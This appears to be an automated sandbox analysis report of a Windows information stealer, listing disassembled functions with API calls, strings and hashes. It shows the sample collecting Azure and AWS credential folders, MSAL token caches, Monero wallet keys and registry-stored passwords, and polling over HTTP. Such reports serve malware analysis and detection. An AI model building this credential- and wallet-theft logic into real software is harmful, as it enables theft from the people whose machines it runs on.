ERROR, xrefs: 00256407
ERROR, xrefs: 002564C9
GET, xrefs: 0025637C

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 97d9ab1be3337c86de757f878ad207d43a4392c82a35219fdece8259d5ba53d1
Instruction ID: beb4b1724173fc875a743b9486212a53ca3e9f2453dcf65513f6c2d3e0f386a7
Opcode Fuzzy Hash: 97d9ab1be3337c86de757f878ad207d43a4392c82a35219fdece8259d5ba53d1
Instruction Fuzzy Hash: FE719171A20208EBDB24DF90CC49BEEB774FB44701F5081A9F50A6B180DBB46A99CF95

Function 00265510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A820: lstrlen.KERNEL32(00254F05,?,?,00254F05,00270DDE), ref: 0026A82B
Part of subcall function 0026A820: lstrcpy.KERNEL32(00270DDE,00000000), ref: 0026A885

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00265644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002656A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00265857

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

Part of subcall function 002651F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00265228

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

Part of subcall function 002652C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00265318
Part of subcall function 002652C0: lstrlen.KERNEL32(00000000), ref: 0026532F
Part of subcall function 002652C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00265364
Part of subcall function 002652C0: lstrlen.KERNEL32(00000000), ref: 00265383
Part of subcall function 002652C0: lstrlen.KERNEL32(00000000), ref: 002653AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0026578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00265940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00265A0C
Sleep.KERNEL32(0000EA60), ref: 00265A1B

Strings

ERROR, xrefs: 00265849
ERROR, xrefs: 00265693
ERROR, xrefs: 002659FE
ERROR, xrefs: 0026577D
ERROR, xrefs: 00265932
ERROR, xrefs: 00265636

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 07612a05593c0c1f2be1b17c37321b682b7ea43483d7de4cb36f5c70d5b8446b
Instruction ID: 269a55fefb57e74bca13b704036a669a947bee0c6ce64e7315ad0b0ea1b7c626
Opcode Fuzzy Hash: 07612a05593c0c1f2be1b17c37321b682b7ea43483d7de4cb36f5c70d5b8446b
Instruction Fuzzy Hash: A8E10A72930104AACB14FBA0DC97AED7378AF64300F508569B50667095EF346EBDCFA6

Function 00264D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00268DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00268E0B

lstrcat.KERNEL32(?,00000000), ref: 00264DB0
lstrcat.KERNEL32(?,\.azure\), ref: 00264DCD

Part of subcall function 00264910: wsprintfA.USER32 ref: 0026492C
Part of subcall function 00264910: FindFirstFileA.KERNEL32(?,?), ref: 00264943

lstrcat.KERNEL32(?,00000000), ref: 00264E3C
lstrcat.KERNEL32(?,\.aws\), ref: 00264E59

Part of subcall function 00264910: StrCmpCA.SHLWAPI(?,00270FDC), ref: 00264971
Part of subcall function 00264910: StrCmpCA.SHLWAPI(?,00270FE0), ref: 00264987
Part of subcall function 00264910: FindNextFileA.KERNEL32(000000FF,?), ref: 00264B7D
Part of subcall function 00264910: FindClose.KERNEL32(000000FF), ref: 00264B92

lstrcat.KERNEL32(?,00000000), ref: 00264EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00264EE5

Part of subcall function 00264910: wsprintfA.USER32 ref: 002649B0
Part of subcall function 00264910: StrCmpCA.SHLWAPI(?,002708D2), ref: 002649C5
Part of subcall function 00264910: wsprintfA.USER32 ref: 002649E2
Part of subcall function 00264910: PathMatchSpecA.SHLWAPI(?,?), ref: 00264A1E
Part of subcall function 00264910: lstrcat.KERNEL32(?,00D4E948), ref: 00264A4A
Part of subcall function 00264910: lstrcat.KERNEL32(?,00270FF8), ref: 00264A5C
Part of subcall function 00264910: lstrcat.KERNEL32(?,?), ref: 00264A70
Part of subcall function 00264910: lstrcat.KERNEL32(?,00270FFC), ref: 00264A82
Part of subcall function 00264910: lstrcat.KERNEL32(?,?), ref: 00264A96
Part of subcall function 00264910: CopyFileA.KERNEL32(?,?,00000001), ref: 00264AAC
Part of subcall function 00264910: DeleteFileA.KERNEL32(?), ref: 00264B31

Strings

Azure\.IdentityService, xrefs: 00264EEB
\.IdentityService\, xrefs: 00264ED9
Azure\.azure, xrefs: 00264DD3
*.*, xrefs: 00264E64
Azure\.aws, xrefs: 00264E5F
\.aws\, xrefs: 00264E4D
\.azure\, xrefs: 00264DC1
msal.cache, xrefs: 00264EF0
*.*, xrefs: 00264DD8

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 31a944b8ef55a40e24b0d1fa94b8562b29f938828e3e8c3d8bdb365bda3334d0
Instruction ID: 48636bc160240961f3decae6cbc04511f8ef54f9841c620766c9a7ce875b9e0f
Opcode Fuzzy Hash: 31a944b8ef55a40e24b0d1fa94b8562b29f938828e3e8c3d8bdb365bda3334d0
Instruction Fuzzy Hash: A94173BA96020866DB14F770DC47FED7238AB65700F4045A4B689660C1EEB45BF98F92

Function 00251310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 002512A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002512B4
Part of subcall function 002512A0: RtlAllocateHeap.NTDLL(00000000), ref: 002512BB
Part of subcall function 002512A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 002512D7
Part of subcall function 002512A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 002512F5
Part of subcall function 002512A0: RegCloseKey.ADVAPI32(?), ref: 002512FF

lstrcat.KERNEL32(?,00000000), ref: 0025134F
lstrlen.KERNEL32(?), ref: 0025135C
lstrcat.KERNEL32(?,.keys), ref: 00251377

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

Part of subcall function 00268B60: GetSystemTime.KERNEL32(00270E1A,00D4A4E0,002705AE,?,?,002513F9,?,0000001A,00270E1A,00000000,?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 00268B86

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00251465

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

Part of subcall function 002599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002599EC
Part of subcall function 002599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00259A11
Part of subcall function 002599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00259A31
Part of subcall function 002599C0: ReadFile.KERNEL32(000000FF,?,00000000,0025148F,00000000), ref: 00259A5A
Part of subcall function 002599C0: LocalFree.KERNEL32(0025148F), ref: 00259A90
Part of subcall function 002599C0: CloseHandle.KERNEL32(000000FF), ref: 00259A9A

DeleteFileA.KERNEL32(00000000), ref: 002514EF

Strings

SOFTWARE\monero-project\monero-core, xrefs: 00251335
.keys, xrefs: 0025136B
wallet_path, xrefs: 00251330
\Monero\wallet.keys, xrefs: 0025138D

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 124d4146d5b733e8926e892a03f3b771e6b9542e6a52b8ac670fefb34f6e1fa8
Instruction ID: 0ac3394a97104722faf9dd043f3ba902a2b71af51dbdf6b71ddd84a32112bc03
Opcode Fuzzy Hash: 124d4146d5b733e8926e892a03f3b771e6b9542e6a52b8ac670fefb34f6e1fa8
Instruction Fuzzy Hash: 6F5101B196011997CB15FB60DD92BED737CAB54300F4041A9B60A72091EE706BA9CFA6

Function 00267500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00267542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0026757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00267603
RtlAllocateHeap.NTDLL(00000000), ref: 0026760A
wsprintfA.USER32 ref: 00267640

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Strings

\, xrefs: 00267560
C, xrefs: 0026754C
', xrefs: 0026764D, 00267655, 0026761B, 00267623
:, xrefs: 0026755C

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\$'
API String ID: 1544550907-925384436
Opcode ID: b9b5d34c26386f04b0409cb4be08379bdb36a191a6c3ac50bfb644d78f63625a
Instruction ID: 193f7a733bf166f682b66a0b2978b202027cf9def32c95a3957bc8f5862fbb3a
Opcode Fuzzy Hash: b9b5d34c26386f04b0409cb4be08379bdb36a191a6c3ac50bfb644d78f63625a
Instruction Fuzzy Hash: 1041A4B1D14248ABDF10DFA4DC45BEEBBB8EF18704F1001A9F50967280DB74AA94CFA5

Function 002575D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 002572D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0025733A
Part of subcall function 002572D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 002573B1
Part of subcall function 002572D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0025740D
Part of subcall function 002572D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00257452
Part of subcall function 002572D0: HeapFree.KERNEL32(00000000), ref: 00257459

lstrcat.KERNEL32(2F4D5020,002717FC), ref: 00257606
lstrcat.KERNEL32(2F4D5020,00000000), ref: 00257648
lstrcat.KERNEL32(2F4D5020, : ), ref: 0025765A
lstrcat.KERNEL32(2F4D5020,00000000), ref: 0025768F
lstrcat.KERNEL32(2F4D5020,00271804), ref: 002576A0
lstrcat.KERNEL32(2F4D5020,00000000), ref: 002576D3
lstrcat.KERNEL32(2F4D5020,00271808), ref: 002576ED
task.LIBCPMTD ref: 002576FB

Strings

: , xrefs: 0025764E

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: 7a7d64d6b85a122b9c67c870ac821facf676f43d4db57812d0c8951d44fa5ab5
Instruction ID: f18580aeed29e31e3458b9ded2105db9ea960646c96baeba2c5a7f86b1bd5b26
Opcode Fuzzy Hash: 7a7d64d6b85a122b9c67c870ac821facf676f43d4db57812d0c8951d44fa5ab5
Instruction Fuzzy Hash: CC315C71920109DFCB04EBB4DC85DFF7378BB54302B148129F502A7290DA74A96ACF9A

Function 00268100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00D4E3B0,00000000,?,00270E2C,00000000,?,00000000), ref: 00268130
RtlAllocateHeap.NTDLL(00000000), ref: 00268137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00268158
__aulldiv.LIBCMT ref: 00268172
__aulldiv.LIBCMT ref: 00268180
wsprintfA.USER32 ref: 002681AC

Strings

%d MB, xrefs: 002681A3
@, xrefs: 0026814D

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
